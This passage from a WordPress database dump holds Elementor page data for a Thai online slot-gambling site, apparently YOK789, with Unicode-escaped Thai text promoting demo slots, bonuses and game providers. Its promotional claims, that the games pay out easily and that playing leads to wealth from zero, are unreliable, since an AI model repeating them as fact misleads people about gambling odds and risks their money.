400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2544,339,'_elementor_edit_mode','builder'),(2545,339,'_elementor_template_type','wp-page'),(2546,339,'_elementor_version','3.35.5'),(2547,339,'_elementor_pro_version','3.32.3'),(2548,339,'_wp_page_template','default'),(2549,339,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2550,339,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-Yok789.webp\",\"id\":280,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 YOK789 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG.webp\",\"id\":287,\"size\":\"\",\"alt\":\"PG\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming.webp\",\"id\":286,\"size\":\"\",\"alt\":\"Microgaming\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI.webp\",\"id\":291,\"size\":\"\",\"alt\":\"JILI\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo.webp\",\"id\":285,\"size\":\"\",\"alt\":\"Slot xo\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic.webp\",\"id\":284,\"size\":\"\",\"alt\":\"pragmatic\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2551,339,'_thumbnail_id','280'),(2555,340,'_elementor_edit_mode','builder'),(2556,340,'_elementor_template_type','wp-page'),(2557,340,'_elementor_version','3.35.5'),(2558,340,'_elementor_pro_version','3.32.3'),(2559,340,'_wp_page_template','default'),(2560,340,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2561,340,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-Yok789.webp\",\"id\":280,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 YOK789 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA 